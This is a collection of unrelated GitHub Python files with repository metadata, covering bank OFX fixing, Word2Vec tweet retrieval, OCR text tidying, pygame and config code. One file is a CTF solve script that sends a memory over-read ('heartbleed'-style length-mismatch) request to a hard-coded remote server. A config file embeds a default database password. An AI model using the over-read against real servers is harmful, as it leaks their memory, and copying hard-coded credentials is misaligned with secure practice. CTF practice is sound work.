transac.memo.data = match_cb_sc_transaction.group('date')
checknum = transac.checknum.data
for other_transac in stmttrnrs.stmtrs.banktranlist.stmttrn:
if other_transac.checknum.data != checknum:
continue
if other_transac.name.data.startswith(match_cb_sc_transaction.group('name')):
other_transac.name.data = match_cb_sc_transaction.group('name')
if other_transac.memo.data.startswith(match_cb_sc_transaction.group('name')):
other_transac.memo.data = match_cb_sc_transaction.group('name')
def fix_cc_cl_transaction(transac):
"""Fix credit card/contact less transactions"""
match_cb_sc_transaction = RE_CC_CL_TRANSACTION.match(transac.name.data)
if match_cb_sc_transaction:
transac.trntype.data = OFX_PAYMENT
transac.name.data = transac.memo.data
transac.memo.data = "%s %s" % (match_cb_sc_transaction.group('type'), match_cb_sc_transaction.group('date'))
def fix_transfer(transac):
"""Fix transfer"""
if transac.trntype.data == OFX_DEBIT:
match_transfer_memo = RE_TRANSFER_MEMO.match(transac.memo.data)
if match_transfer_memo:
transac.trntype.data = OFX_XFER
if match_transfer_memo.group('memo'):
transac.memo.data = "%s (%s)" % (match_transfer_memo.group('memo'),
match_transfer_memo.group('id'))
if transac.trntype.data == OFX_XFER:
transac.checknum.data = ''
def fix_atm(transac):
"""""# Fix ATM"""
if transac.trntype.data == OFX_ATM:
transac.memo.data = "%s %s" % (transac.name.data, transac.memo.data)
transac.name.data = BP_ATM
def fix_loan(transac):
"""Fix loan"""
if transac.name.data == BP_LOAN:
transac.name.data = "%s %s" % (transac.name.data, transac.checknum.data)
transac.checknum.data = ''
def fix_check_deposit(transac):
"""""# Fix check deposit"""
match_depot_cheque = RE_CHECK_DEPOSIT.match(transac.name.data)
if match_depot_cheque:
transac.trntype.data = OFX_CHECK
transac.memo = transac.name
transac.name.data = BP_CHECK
def fix_ofx(in_ofx, out_ofx):
"""
Produce a new, corrected OFX file from the given original OFX file
@param str in_ofx: OFX file to fix
@param str out_ofx: path to write corrected OFX file
"""
ofx = ofxutil.OfxUtil(in_ofx)
for stmttrnrs in ofx.bankmsgsrsv1.stmttrnrs:
for transaction in stmttrnrs.stmtrs.banktranlist.stmttrn:
fix_transaction_type_from_name(transaction, stmttrnrs)
fix_cc_cl_transaction(transaction)
fix_transfer(transaction)
fix_atm(transaction)
fix_loan(transaction)
fix_check_deposit(transaction)
ofx.write(out_ofx)
def main():
"""
Program main function
"""
if len(sys.argv) < 2:
sys.exit('Bad argument count')
input_ofx = sys.argv[1]
if len(sys.argv) > 2:
output_ofx = sys.argv[2]
else:
output_ofx = "%s_corrected%s" % os.path.splitext(input_ofx)
fix_ofx(input_ofx, output_ofx)
if __name__ == '__main__':
main()
|
[
"jonathand131@gmail.com"
] |
jonathand131@gmail.com
|
7d317a9cb596703ebfacee0371f6d82817ab2c61
|
ab347155ce07fcd1cafa43e0ac7839c6367d2312
|
/gitweb/lib/python3.6/locale.py
|
02e7a5083cd25798ff680d203f0042d96da2b861
|
[] |
no_license
|
zlynn247/zlynn247.github.io
|
b51624bbe8d6b6feca117f95b5e6659b9532844e
|
5ad5373ad15aa9ab159129bd25003f3611e42105
|
refs/heads/master
| 2021-06-17T22:24:31.517412
| 2021-01-30T20:52:54
| 2021-01-30T20:52:54
| 151,956,374
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 44
|
py
|
/home/zach/anaconda3/lib/python3.6/locale.py
|
[
"zacharyslynn@gmail.com"
] |
zacharyslynn@gmail.com
|
6f920e8d857378b555f1c47659ddb702f88f877d
|
7dfd5e6534ff9b789e66f9e3dd32df6714479d14
|
/weekly_pwnable/week1/solve.py
|
bc0eccded58e8703573f030d07723e1d8c990580
|
[] |
no_license
|
realbadbytes/ctf_dump
|
befdf2b88114d689291a054b8574b22aa3856c8b
|
693ad57710f114e535881c7118d033e309e6f8ed
|
refs/heads/master
| 2021-01-22T22:20:19.105210
| 2018-12-06T05:09:53
| 2018-12-06T05:09:53
| 85,530,655
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
#!/usr/bin/python3
from pwn import *
# r = process('/home/user/ctf_dump/weekly_pwnable/week1/xkcd')
conn = remote('167.99.10.211', 4444)
conn.sendline('SERVER, ARE YOU STILL THERE? IF SO, REPLY "{}" ({} LETTERS)'.format("B"*512, 528))
print(conn.recvline())
|
[
"badbytes.io@gmail.com"
] |
badbytes.io@gmail.com
|
8639b09e22a762e097a17fdc88dc760c1dfef671
|
f13e64e92c03d2b1e179e798941b460089e0c6b8
|
/config.py
|
639192a585ffbe4c10eecf4f770ecca138bcd477
|
[] |
no_license
|
mohan78/pro1
|
c4ce29c2b3ae03be1c5f815cf28b0f38343430a9
|
07bf763b219c80a2d288a8d7a027b62304611b66
|
refs/heads/master
| 2023-07-08T22:20:47.156501
| 2021-08-11T04:39:02
| 2021-08-11T04:39:02
| 393,147,019
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 226
|
py
|
import os
class Config:
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL', 'postgresql://postgres:1397@localhost:5432/project1')
SQLALCHEMY_TRACK_MODIFICATIONS = False
DEBUG = os.environ.get('DEBUG', True)
|
[
"mohanroger63@gmail.com"
] |
mohanroger63@gmail.com
|
57c0c4e40f3284e6323c34b51637cd58390ac524
|
7a6b62e1744f58bf42db306f8ee0341e4105f74e
|
/coursera python basics/Michigan University/def1.py
|
b9620b51f5c7fff5cdd082427f7925820ba6411a
|
[] |
no_license
|
kiselevskaya/Python
|
cd15722992c11ecea3eb5fb8d84b2ce8f1e09189
|
c7053787e385a27dec1ae22c7b4b1f5d0362c87a
|
refs/heads/master
| 2023-06-15T19:13:34.594899
| 2021-07-15T19:57:38
| 2021-07-15T19:57:38
| 113,674,495
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
def computepay(h,r):
if h <= 40:
pay = h * r
else:
pay = 40 * r + (1.5 * r * (h - 40))
return pay
try:
hrs = raw_input("Enter Hours:")
h = float(hrs)
rate = raw_input("Enter Rate:")
r = float(rate)
except:
print 'Error, please enter numeric input'
quit()
p = computepay(h,r)
print p
|
[
"kiselevskaya.viktoriya@gmail.com"
] |
kiselevskaya.viktoriya@gmail.com
|
1da6b4bdb096618e1b81fd8e0b6526d408c2740b
|
e27333261b8e579564016c71d2061cc33972a8b8
|
/development_codes/Backend/.history/Word2Vecimplementation_20210807163821.py
|
a98c96bff762a25a2db8ea548a2cbfea6460d445
|
[] |
no_license
|
Dustyik/NewsTweet_InformationRetrieval
|
882e63dd20bc9101cbf48afa6c3302febf1989b1
|
d9a6d92b51c288f5bcd21ea1cc54772910fa58f7
|
refs/heads/master
| 2023-07-01T09:12:53.215563
| 2021-08-12T08:28:33
| 2021-08-12T08:28:33
| 382,780,359
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,807
|
py
|
from gensim.models.word2vec import LineSentence
from BM25implementation import BM25Class, QueryParsers
from gensim.models import Word2Vec
from sklearn.metrics.pairwise import cosine_similarity
import tempfile
import numpy as np
import pandas as pd
from BM25implementation import *
from time import time
from IPython.display import display
MIN_COUNT = 0 #min count of words when training model, default is 5
SIZE = 50 #dimensions of embedding, default 100
WORKERS = 3 #number of partitions during training, default workers is 3, used for training parallelization
WINDOW = 3 #max window size of words around it, default 5
SG = 0 #training algo, either CBOW (0) or SKIPGRAM (1), default CBOW
VECTOR_SIZE = 100 #dimensional space that Word2Vec maps the words onto, default 100
EPOCHS = 1
GENSIM_MODEL_FILEPATH = ""
class Word2VecModel:
def __init__(self, tweets_data):
self.tweets_data = tweets_data
self.corpus = self.process_corpus(tweets_data)
self.model = self.create_model(self.corpus)
#print ("In init", self.model.wv.key_to_index.keys())
def process_corpus(self, tweets_data):
list_of_list = [row.split(" ") for row in tweets_data.clean_text]
return list_of_list
def create_model(self, corpus):
w2v_model = Word2Vec(
min_count = MIN_COUNT,
workers = WORKERS,
window = WINDOW,
sg = SG,
vector_size = VECTOR_SIZE)
#t = time()
w2v_model.build_vocab(corpus_iterable = corpus, progress_per=1000)
#print('Time to build vocab: {} mins'.format(round((time() - t) / 60, 2)))
#t = time()
w2v_model.train(corpus_iterable = corpus, total_examples=w2v_model.corpus_count, epochs=30, report_delay=1)
#print('Time to train the model: {} mins'.format(round((time() - t) / 60, 2)))
return w2v_model
def store_model(self):
with tempfile.NamedTemporaryFile(prefix='IR-gensim-model', delete=False) as tmp:
temporary_filepath = tmp.name
print ("Saving Model Temporary Filepath", temporary_filepath)
self.save(temporary_filepath)
def load_model(self):
loaded_model = Word2Vec.load(GENSIM_MODEL_FILEPATH)
return loaded_model
def train_model(self):
self.model.train()
def document_embedding_w2v(self, clean_text):
i = 1
doc_tokens = list(clean_text.split(" "))
print (doc_tokens)
embeddings = []
if len(doc_tokens) < 1:
return np.zeros(VECTOR_SIZE)
else:
for tok in doc_tokens:
if tok in self.model.wv.key_to_index:
embeddings.append(self.model.wv.word_vec(tok))
else:
print ("not in vocab", tok)
i += 1
# embeddings.append(np.random.rand(VECTOR_SIZE))
# mean the vectors of individual words to get the vector of the document
return np.mean(embeddings, axis=0)
def return_most_significant_tweets(self, query):
query_vector = QueryParsers(query).query
#query_vector_embeded = self.
self.tweets_data["vector"] = self.tweets_data.apply(lambda row:(self.document_embedding_w2v(row.clean_text)), axis=1)
print (query_vector)
#self.tweets_data['similarity']=self.tweets_data['vector'].apply(lambda x: cosine_similarity(np.array(query_vector).reshape(1, -1),np.array(x).reshape(1, -1)).item())
#self.tweets_data.sort_values(by='similarity',ascending=False,inplace=True)
#return self.tweets_data
#function to tokenize query
|
[
"chiayik_tan@mymail.sutd.edu.sg"
] |
chiayik_tan@mymail.sutd.edu.sg
|
876d08fd4a0a4bd05f23c2bcaafe6b6c53e69652
|
959a200bdc6b088a21b593889bb9fe20f43a0fef
|
/sprite.py
|
7d2ee36e8c4d9f4b4d558fe69dfa1a5ba5cdcb6f
|
[] |
no_license
|
HAK-ux/Brick_Breaker
|
7ab1540a1dda85c1f012b28e85c12b702da0d784
|
311085d532496c23197ba57fc2fcd5cc9fd16a67
|
refs/heads/main
| 2023-07-24T13:04:45.232743
| 2021-09-07T07:46:53
| 2021-09-07T07:46:53
| 403,806,855
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 908
|
py
|
import pygame
# Class representing a sprite.
class Sprite:
def __init__(self, surface, width, height, initial_x, initial_y):
# Attributes
self.surface = surface
self.width = width
self.height = height
self.x_position = initial_x
self.y_position = initial_y
self.color = pygame.Color('white')
self.rect = pygame.Rect((self.x_position, self.y_position), (self.width, self.height))
def get_width(self):
return self.width
def get_height(self):
return self.height
def get_x_pos(self):
return self.x_position
def get_y_pos(self):
return self.y_position
def set_width(self, width):
self.width = width
def set_height(self, height):
self.height = height
def set_x_pos(self, x):
self.x_position = x
def set_y_pos(self, y):
self.y_position = y
|
[
"haiderak@students.cs.ubc.ca"
] |
haiderak@students.cs.ubc.ca
|
759bc95aab627730234d447437ce14f29bfd4235
|
12709ca90b699bd76cb6875ea2c7a32461edd9fa
|
/Blocks/EndWhileBlock.py
|
350eb759e711b459d15fc5f4145ad3054d1351b8
|
[
"Apache-2.0"
] |
permissive
|
namo-ratna-trayaya/Grail
|
07bdb7b78d7141b47e2be45e4a209d07058a4758
|
d0197d9bf8e25c125742be2517fc2f6659ef02e7
|
refs/heads/master
| 2021-06-03T19:23:12.647306
| 2016-06-12T14:27:46
| 2016-06-12T14:27:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,052
|
py
|
from Block import Block
class EndWhileBlock(Block):
'''
generates sql to end a while loop
'''
endStr=""
def getEndStr(self):
'''
returns the ending string
'''
return self.endStr
def __init__(self,stage,indent,endStr,counter):
'''
constructor: generates the sql for end while
@param stage: stage of the block
@type stage: string
@param indent: indent level
@type indent: int
@param endStr: end string
@type endStr: string
@param counter: table name thats used to decide the number of iterations
@type counter: string
'''
super(EndWhileBlock,self).__init__(stage,indent)
self.endStr=endStr
if(self.endStr=="NO_MESSAGE"):
self.append("flag := (SELECT COUNT (*) FROM " + str(counter) + ");")
else:
self.append("flag := flag - 1;")
self.append("END LOOP;",indent-1)
self.append("\nEND $$;")
self.sql=self.sb
|
[
"siddu92new@gmail.com"
] |
siddu92new@gmail.com
|
9e1ef4df64a6f45ddd5429b0f9cc48d51648c085
|
524223168cc3e4af23a3a7e46cc03086e823b838
|
/polls/views.py
|
c07366fcd4bbe6beedb5d9537a4cdb9d4236bd95
|
[] |
no_license
|
moonsng/mysite
|
ebe80708ea0f05037aa8f26a19797c868630ccfc
|
d5cd71b82a9494ac9550756d8ccb5e87394fe106
|
refs/heads/master
| 2023-06-26T10:16:40.155754
| 2021-07-26T05:36:17
| 2021-07-26T05:36:17
| 389,520,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
def index(request):
return HttpResponse("HELLO")
# Create your views here.
|
[
"ericajg324@naver.com"
] |
ericajg324@naver.com
|
4ae88be2832aa4f68f902e14e397487fc2d68ae1
|
3e2607dc50fe20674f5249f58f3fbc5066e7b506
|
/0x0A-python-inheritance/3-is_kind_of_class.py
|
7533ff6d07a53c6d10973dc21d071a45f05368e7
|
[] |
no_license
|
francisco0522/holbertonschool-higher_level_programming
|
685b300e93afba51699d065e73419e95fabd37d2
|
789d737a738a150b32f3b2dc9d1b106ce423eb60
|
refs/heads/master
| 2020-09-29T04:11:27.813003
| 2020-07-20T18:52:03
| 2020-07-20T18:52:03
| 226,946,158
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 143
|
py
|
#!/usr/bin/python3
def is_kind_of_class(obj, a_class):
if isinstance(obj, a_class):
return (True)
else:
return (False)
|
[
"pacho0522@gmail.com"
] |
pacho0522@gmail.com
|
e12dc23d3267c70efa7ccbcc57e9ed839f3a8aaf
|
940a7bbe4cb4ebf620e79beb755704e0de74e416
|
/Projekt/rozdz16/country_codes.py
|
6afb3fe01f7c8ac7588dcdcede01a99b489b377f
|
[] |
no_license
|
bbaldyga/Python
|
1cf52b22173b3096d4d6ae5bee0325805c33a58f
|
45669c8913bf403e280fba23029a992f6689c4ec
|
refs/heads/master
| 2023-05-26T05:53:23.041564
| 2021-06-10T18:14:17
| 2021-06-10T18:14:17
| 345,006,164
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 428
|
py
|
from pygal.maps.world import COUNTRIES
def get_country_code(country_name):
"""Return the pygam 2-digit country code form the given country"""
for code, name in COUNTRIES.items():
if name == country_name:
return code
#If country wans found return none
return None
print(get_country_code('Andorra'))
print(get_country_code('United Arab Emirates'))
print(get_country_code('Afghanistan'))
|
[
"baldygablazej@gmail.com"
] |
baldygablazej@gmail.com
|
7cae122dd1ea97db0a34ef601b7b3f4d9e4e154e
|
9958a14eea4e016f94d3ce31223076550c94ef67
|
/carmin-server/server/resources/models/boolean_response.py
|
a8fff93110b327d7dc56d897acd0e9a503b992bb
|
[
"MIT"
] |
permissive
|
louis-ver/CARMIN
|
03af8fce7f42af0ff823a4323c72c8da9aa4e040
|
2f9036b20c723740790da17bdf84d92eb19c036e
|
refs/heads/develop
| 2021-09-09T03:34:44.570114
| 2018-03-12T21:33:02
| 2018-03-12T21:33:02
| 113,084,961
| 0
| 0
|
MIT
| 2018-03-12T21:33:03
| 2017-12-04T19:23:05
|
Python
|
UTF-8
|
Python
| false
| false
| 428
|
py
|
from marshmallow import Schema, fields, post_load
class BooleanResponse():
def __init__(self, exists: bool):
self.exists = exists
def __eq__(self, other):
return self.__dict__ == other.__dict__
class BooleanResponseSchema(Schema):
class Meta:
ordered = True
exists = fields.Boolean(required=True)
@post_load
def to_model(self, data):
return BooleanResponse(**data)
|
[
"noreply@github.com"
] |
louis-ver.noreply@github.com
|
917c2c04093058446e6e897bb65314bbfd598e5a
|
526dfe77d7c2b92e5b9e5f74c41e52d59003bc8b
|
/03ConditionalsAndControlFlow/99try.py
|
4bbc39c0ed0224df4126350b97642219d83a571a
|
[] |
no_license
|
roonitoon/training
|
b5b188b9a1ebad51968467c8a559de2724d12e64
|
b05b58b7b16b2bbe82419c2316d357f45c81faff
|
refs/heads/master
| 2022-01-20T06:55:33.591266
| 2019-04-18T09:25:38
| 2019-04-18T09:25:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 91
|
py
|
# รับคะแนน แล้วให้ตีออกเป็น grade A,B,C,D,F
|
[
"adisak@intelligent-bytes.com"
] |
adisak@intelligent-bytes.com
|
2181f2fe6f75fac789710cbdac67601e469c859f
|
377dc973a58d30154cf485de141223d7ca5424dd
|
/havok_classes/hkxMaterialShaderSet.py
|
11d2777e0336631ee065cf111434eaee979b4597
|
[
"MIT"
] |
permissive
|
sawich/havok-reflection
|
d6a5552f2881bb4070ad824fb7180ad296edf4c4
|
1d5b768fb533b3eb36fc9e42793088abeffbad59
|
refs/heads/master
| 2021-10-11T12:56:44.506674
| 2019-01-25T22:37:31
| 2019-01-25T22:37:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
from .hkReferencedObject import hkReferencedObject
from typing import List
from .common import get_array
from .hkxMaterialShader import hkxMaterialShader
class hkxMaterialShaderSet(hkReferencedObject):
shaders: List[hkxMaterialShader]
def __init__(self, infile):
self.shaders = get_array(infile, hkxMaterialShader, 0) # TYPE_ARRAY:TYPE_POINTER
def __repr__(self):
return "<{class_name} shaders=[{shaders}]>".format(**{
"class_name": self.__class__.__name__,
"shaders": self.shaders,
})
|
[
"kevin@turtlerockweb.com"
] |
kevin@turtlerockweb.com
|
355025c8b812e8925a20b8f940ecb66379aac49c
|
de8eb9dcdbe58fb4f8b76c497d4cbb9020090e9c
|
/anokas_starter.py
|
69f59e6ccebacf586ba64e2f918a26a73d3f77d8
|
[] |
no_license
|
wkirgsn/zillow-price
|
7a544d51f36d908284c6cd097d35caf0be120cbe
|
252141917f813a6f710e7ee49c72b05c68fceec9
|
refs/heads/master
| 2021-05-16T13:39:14.671670
| 2017-10-01T11:47:00
| 2017-10-01T11:47:00
| 105,437,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,850
|
py
|
import numpy as np
import pandas as pd
import xgboost as xgb
from catboost import CatBoostRegressor
import gc
print('Loading data ...')
train = pd.read_csv('data/train_2016_v2.csv', parse_dates=['transactiondate'])
prop = pd.read_csv('data/properties_2016.csv')
sample = pd.read_csv('data/sample_submission.csv')
print('Binding to lower types')
for c, dtype in zip(prop.columns, prop.dtypes):
if dtype == np.float64:
prop[c] = prop[c].astype(np.float32)
elif dtype == np.int64:
prop[c] = prop[c].astype(np.int32)
print('Creating training set ...')
df_train = train.merge(prop, how='left', on='parcelid')
cols_to_drop = ['parcelid', 'logerror', 'transactiondate', 'propertyzoningdesc',
'propertycountylandusecode']
x_train = df_train.drop(cols_to_drop, axis=1)
y_train = df_train['logerror'].values
print(x_train.shape, y_train.shape)
train_columns = x_train.columns
for c in x_train.dtypes[x_train.dtypes == object].index.values:
x_train[c] = x_train.loc[:, c].notnull()
del df_train; gc.collect()
cat = CatBoostRegressor()
cat.fit(x_train, y_train)
split = 80000
x_train, y_train, x_valid, y_valid = x_train[:split], y_train[:split], \
x_train[split:], y_train[split:]
print('Building DMatrix...')
d_train = xgb.DMatrix(x_train, label=y_train)
d_valid = xgb.DMatrix(x_valid, label=y_valid)
del x_train, x_valid; gc.collect()
print('Training ...')
params = {}
params['eta'] = 0.02
params['objective'] = 'reg:linear'
params['eval_metric'] = 'mae'
params['max_depth'] = 4
params['silent'] = 1
watchlist = [(d_train, 'train'), (d_valid, 'valid')]
clf = xgb.train(params, d_train, 10000, watchlist, early_stopping_rounds=100,
verbose_eval=10)
del d_train, d_valid
print('Building test set ...')
sample['parcelid'] = sample['ParcelId']
df_test = sample.merge(prop, on='parcelid', how='left')
del prop; gc.collect()
x_test = df_test.loc[:, train_columns]
nancols = x_test.dtypes[x_test.dtypes == object].index.values.tolist()
x_test[nancols] = x_test.loc[:, nancols].notnull()
del df_test, sample; gc.collect()
p_test_cat = cat.predict(x_test)
d_test = xgb.DMatrix(x_test)
del x_test; gc.collect()
print('Predicting on test ...')
p_test = clf.predict(d_test)
del d_test; gc.collect()
sub = pd.read_csv('data/sample_submission.csv')
for c in sub.columns[sub.columns != 'ParcelId']:
sub[c] = p_test_cat
print('Writing csv ...')
sub.to_csv('out/xgb_starter_compressed_cat.csv.gz', index=False,
float_format='%.4g',
compression='gzip')
print('ensemble..')
for c in sub.columns[sub.columns != 'ParcelId']:
sub[c] = (p_test_cat + p_test)/2
print('Writing csv ...')
sub.to_csv('out/xgb_starter_compressed_catxgb_mean.csv.gz', index=False,
float_format='%.4g',
compression='gzip')
|
[
"wilhelmk@mail.uni-paderborn.de"
] |
wilhelmk@mail.uni-paderborn.de
|
9544841fc293907e211e29dc992b4419391f68dc
|
5a95f6c93b33395dbe8196272ceeeb5db8807595
|
/goods/goods/wsgi.py
|
edce0dd24217a5e012955ac06bff9f2b28ea6b07
|
[] |
no_license
|
endlessmeal/simbirsoft_services
|
c69070a48fbcbc7f22b5adb117d7a5572a3fa6bf
|
7d04bec672981d137343deb23571b0ad88ece0e5
|
refs/heads/master
| 2022-12-07T05:33:11.685829
| 2020-09-06T14:00:03
| 2020-09-06T14:00:03
| 278,183,758
| 0
| 0
| null | 2020-09-06T14:00:06
| 2020-07-08T20:05:01
|
Python
|
UTF-8
|
Python
| false
| false
| 387
|
py
|
"""
WSGI config for goods project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "goods.settings")
application = get_wsgi_application()
|
[
"baloyan99@list.ru"
] |
baloyan99@list.ru
|
c61b485be71d37e1c1aa04dbb57dde30e36caab9
|
8cd76a2218bdadb6126ea176c2840daf27f2b146
|
/pycode_hub/012_tidy_content.py
|
caae2be5f4decb41b07adf2652bcfaa4b7709426
|
[] |
no_license
|
hee0624/pycode
|
bf27b4c3eda2cb4f0031f7b38c26abbdc049b532
|
d19c0fb28d1eb0b655347b5ca4b00cc84521ba94
|
refs/heads/main
| 2023-04-19T12:04:33.433896
| 2021-04-29T09:05:43
| 2021-04-29T09:05:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,212
|
py
|
# coding:utf-8
"""
@desc: 处理ocr之后的内容,整理成完整的语义段落
@author: chenhe
@create: 2018年 12月 19日 星期三 09:24:52 CST
"""
import re
import jieba
def tidy_content(ori_content, line_num=24):
"""
处理ocr之后的内容,整理成完整的语义段落
:param ori_content: 待整理的内容,类型为string
:return fmt_content: 格式为string
"""
lines_blank = []
lines_title = []
lines_merge = []
lines_res = []
word_dic = set()
with open('dict.txt') as fp:
for line in fp:
if line.strip():
word = line.split(' ')[0]
word_dic.add(word)
lines = ori_content.split('\n')
tmp = []
lines.insert(0, '')
lines.insert(1, '')
# 处理标题分开
for ix, line in enumerate(lines):
line = line.strip()
if re.match('\s*[\((]?\s*[0-9一二三四五六七八九十]+[\))]?\s*[、::]?$', line):
print(line)
tmp.append(line)
else:
if tmp:
tmp.append(line)
bind_line = ''.join(tmp)
bind_line = bind_line.replace('\n', '')
lines_title.append(bind_line)
tmp.clear()
else:
lines_title.append(line)
# 遇到小标题,上下行添加空白行
for ix, line in enumerate(lines_title):
line = line.strip()
if re.match('\s*\d+\s*\.', line):
lines_blank.append('')
lines_blank.append(line)
elif re.match('\s*[\((]\s*[\d\w]+\s*[\))]', line):
lines_blank.append('')
lines_blank.append(line)
elif re.match('\w{2,7}\s*[::]', line):
lines_blank.append('')
lines_blank.append(line)
elif re.match('^.*?[::]$', line):
lines_blank.append(line)
lines_blank.append('')
else:
try:
front_line = lines[ix-1]
if re.match('^(.*?[。?!]\s*)$', front_line):
lines_blank.append('')
lines_blank.append(line)
else:
lines_blank.append(line)
except IndexError:
lines_blank.append(line)
# 合并段落
tmp = []
for line in lines_blank:
num = len(line)
if num >= line_num and not tmp:
tmp.append(line)
elif num <= line_num and tmp:
tmp.append(line)
lines_merge.append(''.join(tmp))
tmp.clear()
elif num >= line_num and tmp:
tmp.append(line)
else:
lines_merge.append(line)
else:
if tmp:
lines_merge.append(''.join(tmp))
# 处理行尾与下一行是一个词
try:
end_word = list(jieba.cut(lines_merge[0]))[-1]
lines_res.append(lines_merge[0])
except IndexError:
end_word = ''
lines_res.append('')
for line in lines_merge[1:]:
tmp = end_word
seg_list = list(jieba.cut(line))
if seg_list:
first_word = seg_list[0]
end_word = seg_list[-1]
word = tmp + first_word
if tmp in [',', ',', ';']:
last_line = lines_res.pop()
bind_line = last_line + line
lines_res.append(bind_line.replace('\n', ''))
elif len(first_word) == 1 and (word in word_dic):
last_line = lines_res.pop()
bind_line = last_line + line
lines_res.append(bind_line.replace('\n', ''))
else:
lines_res.append(line)
else:
lines_res.append(line)
fmt_lst = []
for ix, line in enumerate(lines_res):
if line.strip():
fmt_lst.append(line)
print(ix, line)
fmt_content = '\n'.join(fmt_lst)
return fmt_content
if __name__ == '__main__':
text = """
信用卡中心财务管理委员会通知书
客户服务部:
经信用卡中心财务管理委员会二O一七年第二十四次会议(2017年
12月01日)表决通过贵部门以下议题:
议题:客户服务部关于建设外交部全球领事保护与服务应急呼叫中
心手机APP的请示(2014年,信用卡中心代装民生银行代维代建了“外
交部全球领事保护与服务应急呼叫中心”(简称“呼叫中心”),并于当年
3月2日正式运营,面向全球华人开放。根据形势发展需要,外交部拟
将借力信息技术和新媒体传播优势,外交部在2016年的招标文件中要求
新建基于APP的多媒体服务求助平台,实现与呼叫中心系统的无缝对接,
并计划在2017年推出12308手机APP,在提供高质量政府服务的同时,
追求与移动互联网发展节奏-一致的高质量用户体验。计划于2018年1月
31曰前完成系统上线。
经卡中心科技管理部评估,此项目费用共约148.8万元。费用具体
明细如下:
贵别预算跳用工 贷源配登方式
佻应谢
硬件:
251元科技标准产 品
"""
# with open('result.txt', 'r') as fp:
# text = fp.read()
print(tidy_content(ori_content=text))
|
[
"chenhe@datahorizon.cn"
] |
chenhe@datahorizon.cn
|
bad3c8290c03c546ca8cb00e740e87e0c82af504
|
543a414c879b62484a6837a1d8dbcf736cc486da
|
/mymod.py
|
b0cdcdfc01877dfa29e2dc195ddefe2d1d1dc470
|
[] |
no_license
|
hanochk/myRepo
|
d8a94a459f200625889473df998e4e7e2c569bf8
|
a1138b0fbf0763d31255a5292dd79752ff589161
|
refs/heads/master
| 2021-07-15T10:50:07.874648
| 2021-02-18T12:54:02
| 2021-02-18T12:54:02
| 97,365,481
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 336
|
py
|
# mymod.py
"""Python module demonstrates passing MATLAB types to Python functions"""
def search(words):
"""Return list of words containing 'son'"""
newlist = [w for w in words if 'son' in w]
return newlist
def theend(words):
"""Append 'The End' to list of words"""
words.append('The End')
return words
|
[
"noreply@github.com"
] |
hanochk.noreply@github.com
|
362a23564914b6d36a4e32aacc9ab9590bbc7c70
|
3beb93caec1a26a9e058dc1b60d61e57bdaa56cd
|
/upgrades/surveyor.py
|
c965341eb5a7224fdae0f639c2cac59752ba4bd9
|
[] |
no_license
|
dudisgit/REMOTE-python-game
|
0c91db596ac6e044409065166c6dc0b95264539d
|
c5462900e0b78a3e1a0eecdc684fe6735207355c
|
refs/heads/master
| 2021-01-25T08:19:36.204298
| 2018-05-10T20:01:36
| 2018-05-10T20:01:36
| 93,753,147
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import upgrades.base as base
class Main(base.Main):
def __init__(self,LINK,ID=-1):
self.init(LINK)
self.ID = ID
self.name = "surveyor"
self.displayName = "Surveyor" #Name of the upgrade (displayed)
self.droneUpgrade = False
self.damage = 0 #Damage to the upgrade.
self.used = True
def loop(self,lag): #Loop ran single player or server side
if not self.damage==2 and self.ID!=-1:
self.LINK["showRooms"] = True
|
[
"dudethisbotguyisedgy@gmail.com"
] |
dudethisbotguyisedgy@gmail.com
|
669da776948e077624f44e22fdecf2816689f56c
|
a9ae4498a248f39c229d2eb1f10c401b3127bb6a
|
/decision_tree_regression.py
|
de740b023190c9581a48ba94f1ac2d10cdc646ef
|
[] |
no_license
|
samariotorres/projects
|
64a6a32ed51a48082ba18b253efd91604e0465c1
|
4d8f6ffc4a3ccd72bb435af7bc74f8b59e7209e5
|
refs/heads/master
| 2020-04-14T14:17:52.249734
| 2019-01-22T04:05:13
| 2019-01-22T04:05:13
| 163,892,495
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,952
|
py
|
# Decision Tree REGRESSION (Decision Tree CLASSIFICATION found in decision_tree_classification.py)
# -----------------------------------Decision Tree Intuition------------------------------------------
#Example) Consider a scatter plot that represents some dataset with two indepedent variables x_1 and x_2
# predicting the third variable y (where y is the third dimension). We do not need to be able to visualize y at first.
# We can begin by building our decision tree using the scatter plot, then after we build it, return to y.
# Once we run the decision tree regression algorithm, the scatterplot will be split up into segments, how and where
# the splits are conducted is determined by the algorithm (by mathematical information entropy....complex)
# Boiled down: When the algorithm performs the split, its asking, is the split increasing the amount of information we have
# about our points. Are the splits adding value? how do we want to group our points?
# The algorithm knows when to stop when there is a certain minimum for the information that needs to be added and once
# it cannot add any more information (its reached the minimum), it stops SPLITTING the LEAVES (each split is called
# a leaf). For example, a decision_tree_regression would stop if the following event occured: WHEN we conducted a split,
# that split or leaf would have less than 5% of the total scattered points, then that leaf wouldn't be created.
# Final leaves are called TERMINAL leaves.
# By adding these leaves, we've added information into our system. how does that help us predict the value of y?
